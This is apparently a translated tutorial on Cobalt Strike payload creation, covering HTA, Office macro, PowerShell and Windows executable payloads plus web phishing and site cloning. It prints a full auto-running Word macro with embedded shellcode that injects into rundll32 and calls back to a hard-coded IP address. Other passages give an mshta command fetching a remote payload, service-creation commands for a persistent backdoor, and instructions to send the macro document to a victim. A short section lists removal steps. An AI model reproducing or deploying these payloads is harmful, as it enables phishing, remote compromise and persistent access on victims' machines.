CobaltStrike-006: Creating Attacks

Creating payloads

The Attacks menu offers several options, as follows:

  • HTML Application: generates a malicious HTML Application trojan with the .hta extension. It uses HTML to call application components written in other languages; three methods are offered: Executable, PowerShell and VBA.

  • MS Office Macro: generates an Office macro virus file.

  • Payload Generator: generates payloads in many language versions; it can produce shellcode as C, C#, COM Scriptlet, Java, Perl, PowerShell, Python, Ruby, VBA and so on.

  • Windows Executable: generates 32-bit or 64-bit exe, service-based exe, DLL and other backdoor programs.

  • Windows Executable(S): generates an exe that contains the full Beacon payload and needs no staged request. Compared with the Windows Executable module, it additionally offers proxy settings for penetration testing in more restrictive environments. It also supports a PowerShell script that can be used to inject the stageless payload into memory.

HTML Application

HTML Application generates .hta files. HTA is short for HTML Application: saving HTML directly in the HTA format yields a standalone application whose interface is no different from software written in VB, C++ and similar languages. HTML Application offers three generation methods; in testing, only the .hta generated with the PowerShell method executed and checked in normally, while the .hta files generated with the Executable and VBA methods produced a "script error on the current page" prompt when run.

An .hta generated with the PowerShell method executes and checks in.

Running it through mshta checks in successfully: mshta http://xx.xx.xx.xx/file.ext

An .hta generated with the Executable method raises an error when run.

An .hta generated with the VBA method also raises an error when run.

MS Office Macro

Payloads -> MS Office Macro.

Then choose a listener and click Generate.

Then click Copy Macro, which gives the following macro code:

Private Type PROCESS_INFORMATION
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadId As Long
End Type

Private Type STARTUPINFO
cb As Long
lpReserved As String
lpDesktop As String
lpTitle As String
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

#If VBA7 Then
Private Declare PtrSafe Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As LongPtr
Private Declare PtrSafe Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As LongPtr, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As LongPtr) As LongPtr
Private Declare PtrSafe Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#Else
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVal Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
#End If

' Entry point; the Auto_Open / AutoOpen / Workbook_Open names below run it when the document is opened
Sub Auto_Open()
Dim myByte As Long, myArray As Variant, offset As Long
Dim pInfo As PROCESS_INFORMATION
Dim sInfo As STARTUPINFO
Dim sNull As String
Dim sProc As String

#If VBA7 Then
Dim rwxpage As LongPtr, res As LongPtr
#Else
Dim rwxpage As Long, res As Long
#End If
myArray = Array(-4,-24,-119,0,0,0,96,-119,-27,49,-46,100,-117,82,48,-117,82,12,-117,82,20,-117,114,40,15,-73,74,38,49,-1,49,-64,-84,60,97,124,2,44,32,-63,-49, _
13,1,-57,-30,-16,82,87,-117,82,16,-117,66,60,1,-48,-117,64,120,-123,-64,116,74,1,-48,80,-117,72,24,-117,88,32,1,-45,-29,60,73,-117,52,-117,1, _
-42,49,-1,49,-64,-84,-63,-49,13,1,-57,56,-32,117,-12,3,125,-8,59,125,36,117,-30,88,-117,88,36,1,-45,102,-117,12,75,-117,88,28,1,-45,-117,4, _
-117,1,-48,-119,68,36,36,91,91,97,89,90,81,-1,-32,88,95,90,-117,18,-21,-122,93,104,110,101,116,0,104,119,105,110,105,84,104,76,119,38,7,-1, _
-43,49,-1,87,87,87,87,87,104,58,86,121,-89,-1,-43,-23,-124,0,0,0,91,49,-55,81,81,106,3,81,81,104,-72,34,0,0,83,80,104,87,-119,-97, _
-58,-1,-43,-21,112,91,49,-46,82,104,0,2,64,-124,82,82,82,83,82,80,104,-21,85,46,59,-1,-43,-119,-58,-125,-61,80,49,-1,87,87,106,-1,83,86, _
104,45,6,24,123,-1,-43,-123,-64,15,-124,-61,1,0,0,49,-1,-123,-10,116,4,-119,-7,-21,9,104,-86,-59,-30,93,-1,-43,-119,-63,104,69,33,94,49,-1, _
-43,49,-1,87,106,7,81,86,80,104,-73,87,-32,11,-1,-43,-65,0,47,0,0,57,-57,116,-73,49,-1,-23,-111,1,0,0,-23,-55,1,0,0,-24,-117,-1, _
-1,-1,47,79,51,116,102,0,80,-43,82,9,2,-79,107,117,-87,-46,12,13,34,8,-63,9,4,97,-49,-6,-108,-50,41,78,76,90,-114,23,-19,74,-97,89, _
-103,-5,57,-26,17,-109,-57,-104,-27,-72,46,23,-10,59,-23,45,119,125,-5,-39,-103,-46,-52,44,124,-9,41,-51,-126,117,83,56,-126,-4,-26,81,-21,26,7,-53, _
-67,0,85,115,101,114,45,65,103,101,110,116,58,32,77,111,122,105,108,108,97,47,53,46,48,32,40,99,111,109,112,97,116,105,98,108,101,59,32,77, _
83,73,69,32,57,46,48,59,32,87,105,110,100,111,119,115,32,78,84,32,54,46,49,59,32,87,105,110,54,52,59,32,120,54,52,59,32,84,114,105, _
100,101,110,116,47,53,46,48,59,32,66,79,73,69,57,59,69,78,85,83,41,13,10,0,-10,-119,59,65,62,-3,-103,66,79,43,59,29,116,-46,1,116, _
-109,-86,-117,-117,1,-87,-23,87,-4,-11,83,90,-62,-68,51,-14,73,-108,-47,-99,-84,44,-24,70,77,20,28,-28,-51,126,-120,-116,-6,113,-2,-93,5,-8,113,-112, _
94,12,-72,55,-52,15,-33,48,68,-124,95,-40,10,-64,-72,8,118,-94,-32,-61,107,64,52,-57,69,96,-101,57,51,-30,-72,-92,-48,32,77,-38,21,-2,32,-94, _
105,54,28,30,-126,-45,-26,86,107,-15,-54,-45,-57,-90,-76,-112,-63,-66,-80,-124,-51,-105,-125,-23,103,118,-17,95,68,-56,10,-89,-7,-70,107,63,-110,118,18,64, _
50,-67,103,50,-101,104,-94,32,-54,-68,80,7,126,68,-111,41,78,77,-113,-58,-81,72,-53,-123,-72,-128,8,-2,68,-83,-65,-48,-80,-22,29,6,-23,29,-46,-17, _
-82,-67,-4,-56,-122,27,51,105,-70,-72,67,-28,-117,-16,116,66,-113,-121,-59,19,-32,98,103,52,33,0,104,-16,-75,-94,86,-1,-43,106,64,104,0,16,0,0, _
104,0,0,64,0,87,104,88,-92,83,-27,-1,-43,-109,-71,0,0,0,0,1,-39,81,83,-119,-25,87,104,0,32,0,0,83,86,104,18,-106,-119,-30,-1,-43, _
-123,-64,116,-58,-117,7,1,-61,-123,-64,117,-27,88,-61,-24,-87,-3,-1,-1,56,46,49,51,52,46,50,48,49,46,57,54,0,58,-34,104,-79)
' On 64-bit Windows (ProgramW6432 is set) use the 32-bit rundll32.exe under SysWOW64,
' since the shellcode in myArray is x86
If Len(Environ("ProgramW6432")) > 0 Then
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
Else
sProc = Environ("windir") & "\\System32\\rundll32.exe"
End If

' Start rundll32.exe with no arguments and suspended (dwCreationFlags = 4, CREATE_SUSPENDED);
' this bare rundll32.exe child of WINWORD.EXE is the process seen on the victim host
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)

' Commit an RWX page (MEM_COMMIT = &H1000, PAGE_EXECUTE_READWRITE = &H40) in the child,
' copy the shellcode in one byte at a time, then run it on a new remote thread
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub

Then open the Word editor, click View, then click Macros.

Enter any macro name and click Create.

First clear all the code in there, then paste the code generated by Cobalt Strike, save and exit.

Send this document to someone else; as long as they open it in Word with macros enabled, our CS receives the shell that calls back, and the process name is rundll32.exe.

Enabling or disabling macros in Word: File -> Options -> Trust Center -> Trust Center Settings

Payload Generator

This module generates shellcode in various language versions, which is then compiled with the corresponding language.

Notes:

  • Stager: delivers the payload in stages

  • Stageless: the complete trojan

This section covers two of these payloads: PowerShell and PowerShell Command, both under Payloads -> Stager Payload Generator. Both use PowerShell to check in.

PowerShell

Choosing this payload generates a payload.ps1 file, which can be run in either of the following ways to check in. Under PowerShell:

Import-Module .\payload.ps1

. .\payload.ps1

Under cmd:

powershell Import-Module .\payload.ps1

powershell .\payload.ps1

PowerShell Command

Choosing this payload generates a payload.txt file, which can be used to check in as follows: just copy the file's contents and run them under cmd.

From the victim host's point of view, all three check-in methods above look the same, namely:

powershell -nop -w hidden -encodedcommand <base64-encoded command, elided>

Windows Executable & Windows Executable(S)

These two modules directly generate executable exe or dll files. Windows Executable generates a Stager type trojan, while Windows Executable(S) generates a Stageless type. So what is the difference between Stager and Stageless?

  • Stager delivers the payload in stages. What does staged mean? The Stager trojan we generate is actually a small program whose job is to download the real shellcode from the server. Staging is often necessary because many scenarios place strict limits on how much data can be loaded into memory and executed after a successful exploit, so in those cases we have no choice but to deliver in stages. If staging is not needed, set the host_stage option to false in the C2 profile.

  • Stageless is the complete trojan; it does not need to request shellcode from the server afterwards, so a trojan generated this way is larger than a Stager one. But it helps avoid being traced and analysed: with staging enabled, anyone can connect to your C2 server, request the payload and analyse the configuration inside it. In Cobalt Strike 4.0 and later, post-exploitation and lateral movement mostly use Stageless trojans; for example, building a DNS-based tunnel requires a Stageless payload.

Compared with Windows Executable, Windows Executable(S) contains the full Beacon payload and needs no staged request; the module additionally offers proxy settings for penetration testing in more restrictive environments, and it supports a PowerShell script for injecting the Stageless payload into memory.

Note that a trojan generated as a Windows Service EXE will not return a session when simply double-clicked. It has to be started by creating a service, and cmd must be opened as administrator for the service to be created.

# Note: there must be a space after each equals sign (=)
sc create autoRunBackDoor binPath= "cmd.exe /c C:\Users\test\Desktop\cs_payload\win_service_beacon_x64.exe" start= auto DisplayName= autoRunBackDoor
# Start a system service
sc start autoRunBackDoor
# Stop a system service
sc stop autoRunBackDoor
# Delete a system service
sc delete service_name

On 64-bit Windows 7, the Windows Service EXE generated under Windows Stager Payload gave the following prompt when started: the service did not respond to the start or control request in a timely fashion.

Switching to the Windows Service EXE generated under Windows Stageless Payload, it ran successfully:

sc create autoRunBackDoor binPath= "cmd.exe /c C:\Users\test\Desktop\cs_payload\stagerless_winservice_beacon_x64.exe" start= auto DisplayName= autoRunBackDoor

Looking at the process and service information on the victim host: although the service list suggests the service is not running (the "Start this service" link is shown at the top left), the rundll32.exe process exists in Task Manager; it is the process the service started, and it is interactive from CS.

Capturing packets on the victim host and filtering on the C2 server address and the HTTP protocol reveals a recognisable signature.

sc create autoRunBackDoor binPath= "cmd.exe /c C:\Users\test\Desktop\cs_payload\stagerless_winservice_beacon_x64_01.exe" start= auto DisplayName= autoRunBackDoor

During actual testing something odd happened. When testing the service-based payload above on Windows 7, the connection was alive as seen from CS, but on the Windows machine, while the task list showed the corresponding task (PID 1592), netstat -ano showed the network connection only intermittently, and it disappeared very quickly. Without knowing the C2 address and capturing packets with Wireshark, this backdoor would be quite hard to spot.

How to deal with this kind of backdoor:

  1. Use netstat -ano to find the PID of the malicious process
  2. Use tasklist to find the process for that PID: tasklist /fi "PID eq 1592"
  3. Kill the process with taskkill: taskkill /PID 1592 /F
  4. Delete the corresponding service: sc delete autoRunBackDoor

Click Attacks in the menu bar -> Web Drive-by (website phishing attacks):

  • Web service management: manages the web services that have been started;
  • Clone site: can record the data a victim submits;
  • File download: serves a local file for download; the MIME information can be modified;
  • Scripted Web Delivery(S): a web-based attack test script that automatically generates an executable payload; this module is usually used to generate a PowerShell command that returns a shell;
  • Signed Applet attack: starts a web service to provide a runtime environment for a self-signed Java applet;
  • Smart attack: automatically detects the Java version and uses known exploits to bypass security;
  • Information gathering: collects system information such as the OS version, Flash version and browser version.

Clone site

This module clones a website in order to capture the user's keystrokes.

Then visit the URL